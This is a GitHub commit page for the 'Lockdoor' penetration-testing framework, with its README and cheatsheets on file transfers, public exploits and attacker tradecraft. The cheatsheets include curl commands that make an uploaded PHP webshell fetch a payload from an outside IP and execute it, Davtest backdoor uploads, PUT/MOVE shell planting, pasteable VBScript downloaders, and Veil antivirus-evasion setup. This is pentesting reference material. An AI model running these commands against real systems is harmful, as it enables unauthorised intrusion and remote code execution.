Skip to content

Commit 25ac87e

Browse files
v2.3
1 parent d94b5bf commit 25ac87e

File tree

953 files changed

+1632886
-2
lines changed

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

953 files changed

+1632886
-2
lines changed

CNAME

+1
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
lockdoor.sofianehamlaoui.fr

README.md

+46-2
Original file line numberDiff line numberDiff line change
@@ -1,2 +1,46 @@
1-
# Lockdoor-Framework.github.io
2-
Lockdoor-Framework.github.io
1+
2+
![Logo](https://i.imgur.com/lfTIRCG.png)
3+
4+
# Lockdoor Pentesting Framework
5+
6+
### Overview
7+
8+
*LockDoor* is a Framework aimed at **helping penetration testers, bug bounty hunters And cyber security engineers**.
9+
This tool is designed for Debian/Ubuntu/ArchLinux based distributions to create a similar and familiar distribution for Penetration Testing. But containing the favorite and the most used tools by Pentesters.
10+
As pentesters, most of us has his personal ' /pentest/ ' directory so this Framework is helping you to build a perfect one.
11+
12+
13+
## Pentesting Tools Selection:
14+
15+
- **Tools ?**: **Lockdoor** doesn't contain all pentesting tools , let's be honest ! Who ever used all the Tools you find on all those Penetration Testing distributions ? Lockdoor contains only the favorite and the most used tools by Pentesters.
16+
17+
18+
- **what Tools ?**: the tools contains **Lockdoor** are a collection from the best tools on Kali,Parrot Os and BlackArch. Also some private tools from some other hacking teams like InurlBr, iran-cyber. Without forgetting some cool and amazing tools I found on Github made by some perfect human beings.
19+
20+
21+
- **Easy customization**: Easily add/remove tools.
22+
23+
- **Installation**: You can install the tool automatically using the installer.sh , Manually or by running the Docker Image.
24+
25+
## Resources and cheatsheets:
26+
27+
- **Resources**: That's what makes **Lockdoor**, Lockdoor Doesn't contain only tools ! Pentesing and Security Assessment Findings Reports templates, Pentesting walkthrough examples and templates and more.
28+
29+
30+
- **Cheatsheets**: Everyone can forget something on processing or a tool use, or even some tricks. Here comes the Cheatsheets role ! there are cheatsheets about everything, every tool on the framework and any enumeration, exploitation and post-exploitation techniques.
31+
32+
## License
33+
34+
[The GNU General Public License v3.0 ](https://choosealicense.com/licenses/agpl-3.0/)
35+
36+
## Authors
37+
38+
- [@SofianeHamlaoui](https://www.github.com/SofianeHamlaoui)
39+
40+
## Contributers
41+
- [@B3EF](https://github.com/B3EF)
42+
- [@x3rz](https://github.com/x3rz)
43+
- [@huntr.dev](https://github.com/huntr-helper)
44+
45+
## Check the project on Github : [SofianeHamlaoui/Lockdoor-Framework](https://github.com/SofianeHamlaoui/Lockdoor-Framework)
46+
![Image](https://i.imgur.com/bu8vElw.png)
Binary file not shown.
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,221 @@
1+
# File Transfers
2+
3+
## Simple Local Web Servers
4+
5+
- Run a basic http server, great for serving up shells etc
6+
7+
```ShellSession
8+
python -m SimpleHTTPServer 80
9+
```
10+
11+
- Run a basic Python3 http server, great for serving up shells etc
12+
13+
```ShellSession
14+
python3 -m http.server
15+
```
16+
17+
- Run a ruby webrick basic http server
18+
19+
```ShellSession
20+
ruby -r webrick -e "s = WEBrick::HTTPServer.new(:Port => 8000, :DocumentRoot => Dir.pwd); trap('INT') { s.shutdown }; s.start"
21+
```
22+
23+
- Run a basic PHP http server
24+
25+
```ShellSession
26+
php -S $ip:80
27+
```
28+
29+
- Creating a wget VB Script on Windows:
30+
31+
copy this script on a windows computer to install wget in visualbasic scripting language
32+
33+
dont forget to start the apache2 server attack
34+
35+
```ShellSession
36+
service apache2 start
37+
```
38+
39+
```ShellSession
40+
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
41+
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
42+
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
43+
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
44+
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
45+
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
46+
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
47+
echo Err.Clear >> wget.vbs
48+
echo Set http = Nothing >> wget.vbs
49+
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
50+
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
51+
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
52+
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
53+
echo http.Open "GET", strURL, False >> wget.vbs
54+
echo http.Send >> wget.vbs
55+
echo varByteArray = http.ResponseBody >> wget.vbs
56+
echo Set http = Nothing >> wget.vbs
57+
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
58+
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
59+
echo strData = "" >> wget.vbs
60+
echo strBuffer = "" >> wget.vbs
61+
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
62+
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
63+
echo Next >> wget.vbs
64+
echo ts.Close >> wget.vbs
65+
```
66+
67+
to use simply type
68+
69+
```ShellSession
70+
cscript wget.vbs http://192.168.14.220/evidence.txt evidence.txt
71+
```
72+
73+
- Windows file transfer script that can be pasted to the command line.
74+
75+
File transfers to a Windows machine can be tricky without a Meterpreter shell.
76+
77+
The following script can be copied and pasted into a basic windows reverse and used to transfer files from a web server (the timeout 1 commands are required after each new line):
78+
79+
```ShellSession
80+
echo Set args = Wscript.Arguments >> webdl.vbs
81+
timeout 1
82+
echo Url = "http://1.1.1.1/windows-privesc-check2.exe" >> webdl.vbs
83+
timeout 1
84+
echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> webdl.vbs
85+
timeout 1
86+
echo dim bStrm: Set bStrm = createobject("Adodb.Stream") >> webdl.vbs
87+
timeout 1
88+
echo xHttp.Open "GET", Url, False >> webdl.vbs
89+
timeout 1
90+
echo xHttp.Send >> webdl.vbs
91+
timeout 1
92+
echo with bStrm >> webdl.vbs
93+
timeout 1
94+
echo .type = 1 ' >> webdl.vbs
95+
timeout 1
96+
echo .open >> webdl.vbs
97+
timeout 1
98+
echo .write xHttp.responseBody >> webdl.vbs
99+
timeout 1
100+
echo .savetofile "C:\temp\windows-privesc-check2.exe", 2 ' >> webdl.vbs
101+
timeout 1
102+
echo end with >> webdl.vbs
103+
timeout 1
104+
echo
105+
```
106+
107+
The file can be run using the following syntax:
108+
109+
```ShellSession
110+
C:\temp\cscript.exe webdl.vbs
111+
```
112+
113+
Mounting File Shares
114+
115+
- Mount NFS share to /mnt/nfs
116+
117+
```ShellSession
118+
mount $ip:/vol/share /mnt/nfs
119+
```
120+
121+
- HTTP Put
122+
123+
```ShellSession
124+
nmap -p80 $ip --script http-put --script-args
125+
http-put.url='/test/sicpwn.php',http-put.file='/var/[www/html/sicpwn.php](http://www/html/sicpwn.php)
126+
```
127+
128+
## Uploading Files
129+
130+
- SCP
131+
132+
```ShellSession
133+
scp username1@source_host:directory1/filename1 username2@destination_host:directory2/filename2
134+
scp localfile username@$ip:~/Folder/
135+
scp Linux_Exploit_Suggester.pl [email protected]:~
136+
```
137+
138+
## Webdav with Davtest
139+
140+
Some sysadmins are kind enough to enable the PUT method - This tool will auto upload a backdoor
141+
142+
```ShellSession
143+
davtest -move -sendbd auto -url http://$ip
144+
145+
<https://github.com/cldrn/davtest>
146+
```
147+
148+
- You can also upload a file using the PUT method with the curl command:
149+
150+
```ShellSession
151+
curl -T 'leetshellz.txt' 'http://$ip'
152+
```
153+
154+
And rename it to an executable file using the MOVE method with the curl command:
155+
156+
```ShellSession
157+
curl -X MOVE --header 'Destination:http://$ip/leetshellz.php' 'http://$ip/leetshellz.txt'
158+
```
159+
160+
- Upload shell using limited php shell cmd.
161+
162+
Use the webshell to download and execute the meterpreter
163+
164+
```ShellSession
165+
[curl -s --data "cmd=wget http://174.0.42.42:8000/dhn -O /tmp/evil" http://$ip/files/sh.php
166+
[curl -s --data "cmd=chmod 777 /tmp/evil" http://$ip/files/sh.php
167+
curl -s --data "cmd=bash -c /tmp/evil" http://$ip/files/sh.php
168+
```
169+
170+
- TFTP
171+
172+
```ShellSession
173+
mkdir /tftp
174+
atftpd --daemon --port 69 /tftp
175+
cp /usr/share/windows-binaries/nc.exe /tftp/
176+
EX. FROM WINDOWS HOST:
177+
C:\Users\Offsec>tftp -i $ip get nc.exe
178+
```
179+
180+
- FTP
181+
182+
```ShellSession
183+
apt-get update && apt-get install pure-ftpd
184+
185+
#!/bin/bash
186+
groupadd ftpgroup
187+
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
188+
pure-pw useradd offsec -u ftpuser -d /ftphome
189+
pure-pw mkdb
190+
cd /etc/pure-ftpd/auth/
191+
ln -s ../conf/PureDB 60pdb
192+
mkdir -p /ftphome
193+
chown -R ftpuser:ftpgroup /ftphome/
194+
195+
/etc/init.d/pure-ftpd restart
196+
```
197+
198+
## Packing Files
199+
200+
- Ultimate Packer for eXecutables
201+
202+
```ShellSession
203+
upx -9 nc.exe
204+
```
205+
206+
- exe2bat - Converts EXE to a text file that can be copied and pasted
207+
208+
```ShellSession
209+
locate exe2bat
210+
wine exe2bat.exe nc.exe nc.txt
211+
```
212+
213+
- Veil - Evasion Framework https://github.com/Veil-Framework/Veil-Evasion
214+
215+
```ShellSession
216+
apt-get -y install git
217+
git clone https://github.com/Veil-Framework/Veil-Evasion.git
218+
cd Veil-Evasion/
219+
cd setup
220+
setup.sh -c
221+
```
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,26 @@
1+
# Using Public Exploits
2+
3+
* Be careful running public exploits
4+
5+
## Finding Exploits
6+
7+
[SecurityFocus](http://www.securityfocus.com/vulnerabilities)
8+
9+
### Exploit Database
10+
11+
[Expoit Database](https://www.exploit-db.com/)
12+
13+
Kali contains a script to check this offline:
14+
15+
`searchsploit slmail`
16+
17+
## Fixing Exploits #1
18+
19+
643.c
20+
21+
22+
## Cross Compiling Windows executable code
23+
24+
* use mingw32
25+
26+
`i586-mingw32msvc-gcc 646-fixed.c -lws2_32 -o slmail-windows.exe`
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,49 @@
1+
# Computer and Network Hacker Exploits
2+
3+
## General Trends
4+
5+
### How to make money on malicious code
6+
7+
- Sell the code for backdoors/bots
8+
- Spam and web-based advertising
9+
- Pump and dump stock schemes
10+
- Phishing: e-mail, phone, and targeted (spear) phishing
11+
- Denial of Service extortion
12+
- Keystroke loggers stealing financial information
13+
- Rent out armies of infected systems for all of the above
14+
- RAM scrapers pulling CC numbers of POS terminals
15+
16+
### Software Distro-Site Attacks
17+
18+
- Hack into web and FTP sites and alter software to include backdoor ==> Everyone who downloads and uses the tool is impacted
19+
20+
- Another approach is embodied in ISR-Evilgrade tool
21+
- Listens for software to request update
22+
- Sends response with malware
23+
- Currently includes modules for Java browser plug-ins, Winzip, WinAmp, MacOS X, OpenOffice, iTunes, Linkedln toolbar, and more More than 6o software packages in total whose Internet updates can be subverted this way
24+
25+
### Software Distro-Site Defenses
26+
27+
- Check hashes across multiple mirrors
28+
- Check both MD5 and SHA-1 at least
29+
- Md5sum and sha1sum are built into Linux
30+
- Md5summer is available for free for Windows (md5summer.org)
31+
- Md5deep is another good project at http //md5deepsourceforge.net/
32+
- Calculates MD5, SHA-;, SHA-256, Tiger, and Whirlpool hashes
33+
- Available for Win and Linux/UNIX
34+
- RIPEMD-160
35+
- Check PGP signatures if available
36+
- Make sure you check against a trustworthy key
37+
- Don’t put new software directly into production; test first
38+
39+
---
40+
41+
## Reconnaissance
42+
43+
44+
45+
### DNS and nslookup
46+
47+
- The Domain Name System is full of useful information about a target
48+
• The attacker?s goal is to discover as many IP addresses associated with the target domain as possible
49+
• The nslookup command can be used to interact with a DNS server to get this data

0 commit comments

Comments
 (0)